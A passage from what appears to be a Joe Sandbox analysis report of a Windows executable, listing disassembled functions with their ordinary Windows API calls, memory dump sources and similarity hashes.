      • Part of subcall function 00C9D68B: _wcslen.LIBCMT ref: 00C9D691
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B569
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B59C
    • GetLastError.KERNEL32(?,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B5B9
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateDirectory$ErrorLast_wcslen
    • String ID:
    • API String ID: 2260680371-0
    • Opcode ID: 678c5960024ba6890a03fcc3e9a3669c942aead6c739e1f6e0431e48999e0379
    • Instruction ID: c0f2312ff505aebaedad0bacf8ef3c44bee6421bc7c65beb59c30ff4ccaa929e
    • Opcode Fuzzy Hash: 678c5960024ba6890a03fcc3e9a3669c942aead6c739e1f6e0431e48999e0379
    • Instruction Fuzzy Hash: 0001D471204220BAEF25AB70BE5DFFE32589F0A780F054415F912E6081DB64DF8297A5
    Function 00CBCA43 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
    Download Yara Rule
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CBCA68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: 3168a23929b0ef216c4588175fd62cf41724c7de8ae1e262a8636ebb138bb28e
    • Instruction ID: cb867c18e42d8c7039a26fdb3997344828917c6333dd2a5c11b1c9ade5ce0f82
    • Opcode Fuzzy Hash: 3168a23929b0ef216c4588175fd62cf41724c7de8ae1e262a8636ebb138bb28e
    • Instruction Fuzzy Hash: 2141147050428C9FDF228E68CCC5BFABBA9EF55704F2404EDE59A87142D235AE459F60
    Function 00CBC11C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 00CBC18D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: 20acc7b39a78c83580e0a3ed097ee22135688ca546db623ae57fc652d6791d15
    • Instruction ID: 2545614a2b7aa45f2c48c22f97bb5b280414c9465e5b73682d25366f98018429
    • Opcode Fuzzy Hash: 20acc7b39a78c83580e0a3ed097ee22135688ca546db623ae57fc652d6791d15
    • Instruction Fuzzy Hash: E801D332541209BBCF129FA4DC02EEE7FA2EF08760F414116FE1866161CA729971AB80
    Function 00CBC0BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CBB71F), ref: 00CBC105
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 75dc894c5bffec05a78e53babcb9798bffe56fedff7467c09f8398c4d65916c3
    • Instruction ID: 2b39f1d1d78eac3ccb97b0eb5da36dbde4c8a70eb5d146e4cb7d6847ce7eb86e
    • Opcode Fuzzy Hash: 75dc894c5bffec05a78e53babcb9798bffe56fedff7467c09f8398c4d65916c3
    • Instruction Fuzzy Hash: 1AF0B431641118BBCF159F55DC02FEE7FA1DB18750F00402AFD056A160CE719D10AB80
    Function 00CBBF5F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: 0786745ed9155d5c36b7448898dc3337b7f9b1584469bed93ad114374b0a07c8
    • Instruction ID: 34a9ab488e1d03f7f4a4d8b6da73c1afe5df4bd6c3216d74ce6a6107875eb0c1
    • Opcode Fuzzy Hash: 0786745ed9155d5c36b7448898dc3337b7f9b1584469bed93ad114374b0a07c8
    • Instruction Fuzzy Hash: 0EE0E531A412186B86156BA4DC02FBFBBA5CB04B21F51016AF80567290CFB15E019ACA
    Function 00CBCDA0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CBC96B: GetOEMCP.KERNEL32(00000000,?,?,00CBCBF4,?), ref: 00CBC996
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CBCC39,?,00000000), ref: 00CBCE14
    • GetCPInfo.KERNEL32(00000000,00CBCC39,?,?,?,00CBCC39,?,00000000), ref: 00CBCE27
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: d9e796ef34991693664203e18fd9be442ac3f06ebb28021b9bda3c6f51363de4
    • Instruction ID: f7ed70a3329890f31b0034294fb71be15165814466710789a201b0ce8343e757
    • Opcode Fuzzy Hash: d9e796ef34991693664203e18fd9be442ac3f06ebb28021b9bda3c6f51363de4
    • Instruction Fuzzy Hash: 0A512471D002459FEB249F75C8D16FBBBE5EF41310F1440AEE0A68B192D735DA46DB90
    Function 00C9ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,00C9ACB0,?,?,00000000,?,?,00C99C8B,?), ref: 00C9AE3A
    • GetLastError.KERNEL32(?,?,00C99C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00C9AE49
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 48c1fc6dbdc7f6c0b1f423d09d0790a3f3bc57bbf462e33427e217aed1f899e7
    • Instruction ID: dd14464cac8cbb028f2250316942662cea51bdb7e01ee78f54cceed40f11b4b7
    • Opcode Fuzzy Hash: 48c1fc6dbdc7f6c0b1f423d09d0790a3f3bc57bbf462e33427e217aed1f899e7
    • Instruction Fuzzy Hash: 684125366043458BDF28AF25C88CBAE73A4FF88362F104529E85683A50D771DD85DBD3
    Function 00CAA59B Relevance: 3.1, APIs: 2, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,00CAA7F6,00000000,?), ref: 00CAA699
    • SetWindowTextW.USER32(00000000,00000000), ref: 00CAA6A3
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Window$ShowText
    • String ID:
    • API String ID: 1551406749-0
    • Opcode ID: 6d5b4c9d347a2e411b9db36a9df6143da0de974b47ddfd5a9d7df693a1f22161
    • Instruction ID: 2a45427dce84bb5aef4a433aeb24b6cb7452d07b05d07b42af9c451f5592ff2e
    • Opcode Fuzzy Hash: 6d5b4c9d347a2e411b9db36a9df6143da0de974b47ddfd5a9d7df693a1f22161
    • Instruction Fuzzy Hash: 46314931600716AFDB14DF64DC94E2EBBA8FF49704B09452EF64597260DB61BC41CF92
    Function 00CBCBD7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CBA505: GetLastError.KERNEL32(?,00CD3070,00CB5972,00CD3070,?,?,00CB5271,00000050,?,00CD3070,00000200), ref: 00CBA509
      • Part of subcall function 00CBA505: _free.LIBCMT ref: 00CBA53C
      • Part of subcall function 00CBA505: SetLastError.KERNEL32(00000000,?,00CD3070,00000200), ref: 00CBA57D
      • Part of subcall function 00CBA505: _abort.LIBCMT ref: 00CBA583
      • Part of subcall function 00CBCCFE: _abort.LIBCMT ref: 00CBCD30
      • Part of subcall function 00CBCCFE: _free.LIBCMT ref: 00CBCD64
      • Part of subcall function 00CBC96B: GetOEMCP.KERNEL32(00000000,?,?,00CBCBF4,?), ref: 00CBC996
    • _free.LIBCMT ref: 00CBCC4F
    • _free.LIBCMT ref: 00CBCC85
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID:
    • API String ID: 2991157371-0
    • Opcode ID: 74e2e52e078f3ed82e3823238e732fa1d2f53dcfe603c1e0887d6849100f1fd3
    • Instruction ID: 36ec86ab3c3cc1be5b6bea055f2e8ba7badf3b88611e9990841e150c5bb8b1dd
    • Opcode Fuzzy Hash: 74e2e52e078f3ed82e3823238e732fa1d2f53dcfe603c1e0887d6849100f1fd3
    • Instruction Fuzzy Hash: 4D31E871904108AFDB14EFA9D8C1BEDBBF5EF50321F25409AF5189B291EB365E40EB40
    Function 00C9B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
    Download Yara Rule
    APIs
    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C97ED0,?,?,?,00000000), ref: 00C9B04C
    • SetFileTime.KERNEL32(?,?,?,?), ref: 00C9B100
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 8a592e1256f7ec49139816e8f900be79d4c28b92d02763b0d5f12d91c2184ea1
    • Instruction ID: 0cc63fa3cb01a64dd4456024c67328111bb9afc5f28eeb793851d489746ba454
    • Opcode Fuzzy Hash: 8a592e1256f7ec49139816e8f900be79d4c28b92d02763b0d5f12d91c2184ea1
    • Instruction Fuzzy Hash: 0C213471289242EFCB14CE74DA99AABBBE4AF91304F04491CF4E183141D72AEE0CD762
    Function 00C9A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00C9B1B7,?,?,00C981FD), ref: 00C9A946
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00C9B1B7,?,?,00C981FD), ref: 00C9A976
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 5085afce684c2bfc02e3621b3a7e66def9595d986c75de83ddc740c51867a211
    • Instruction ID: 3b59681fe9d68b538ac941cd7115574b1d7ec7bd43d24daf42fe658f7fb5bf31
    • Opcode Fuzzy Hash: 5085afce684c2bfc02e3621b3a7e66def9595d986c75de83ddc740c51867a211
    • Instruction Fuzzy Hash: A921F2B15043446EE7308A65CC8CFB776ECEB4A364F024A19F9E6C21C1C774A985D6B2
    Function 00CB4CF2 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • FreeLibrary.KERNEL32(00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx,00000000,?,00CB4C9D,00CF40C4,00000FA0), ref: 00CB4D75
    • GetProcAddress.KERNEL32(00000000,?), ref: 00CB4D7F
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressFreeLibraryProc
    • String ID:
    • API String ID: 3013587201-0
    • Opcode ID: 77931cb37ed89e45a2406153072184fbbb7a944e951cc6d3dd410f368d8aeee5
    • Instruction ID: 91833a04383488be658eef998be2a7c6db3b03adeffb36ae516207ee9758247d
    • Opcode Fuzzy Hash: 77931cb37ed89e45a2406153072184fbbb7a944e951cc6d3dd410f368d8aeee5
    • Instruction Fuzzy Hash: 95117C31608115AF8F2ACFB4E890AEE73B4EB96750B254269EA25D7211E7309E01CB91
    Function 00C9B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00C9B157
    • GetLastError.KERNEL32 ref: 00C9B164
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 3a76742cb59f6387fd64ee3cc469488b52c8bcb5c21d6443baae065de68ba59d
    • Instruction ID: 8478b4cee5b03baf3b263416c5d962a38542b710a51793448c9a0d05524765ef
    • Opcode Fuzzy Hash: 3a76742cb59f6387fd64ee3cc469488b52c8bcb5c21d6443baae065de68ba59d
    • Instruction Fuzzy Hash: D111E131600700FBDF298A68E96CBAEB3E9BB44360F604769E162935D0E770EE05C750
    Function 00CBA694 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 00CBA6B5
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00CD30C4,00C9187A,?,?,00000007,?,?,?,00C913F2,?,00000000), ref: 00CBA6F1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 28403e33c6e08039890badaf6d5f13fe1919f800c1435539f2c34e564069a669
    • Instruction ID: 5b76ed4781a2e1bb33b64cc9c270dd8d556e8b475f4af9365020da2910392348
    • Opcode Fuzzy Hash: 28403e33c6e08039890badaf6d5f13fe1919f800c1435539f2c34e564069a669
    • Instruction Fuzzy Hash: 7EF096B1601115B6CB213A66AC45FEF37689FC17B1F1D4016F8E5A71A1EF30DD00A567
    Function 00CA23B6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 00CA23C3
    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CA23CA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: 1de9ee9966584de5aed54762ae1c8b47e5440b77990838b351987f090742d69f
    • Instruction ID: dd922bb0102cac28a684fe459c9184c20a3abe88f3851ddc7e03c2cb6d327091
    • Opcode Fuzzy Hash: 1de9ee9966584de5aed54762ae1c8b47e5440b77990838b351987f090742d69f
    • Instruction Fuzzy Hash: F1E09232B01126A7CF0987A8DC45EAF72ECEB56209324C175E613D3110E978DE0547A0
    Function 00CB961A Relevance: 3.0, APIs: 2, Instructions: 33COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CBD0E0: GetEnvironmentStringsW.KERNEL32 ref: 00CBD0E9
      • Part of subcall function 00CBD0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBD10C
      • Part of subcall function 00CBD0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CBD132
      • Part of subcall function 00CBD0E0: _free.LIBCMT ref: 00CBD145
      • Part of subcall function 00CBD0E0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBD154
    • _free.LIBCMT ref: 00CB9660
    • _free.LIBCMT ref: 00CB9667
    Memory Dump Source
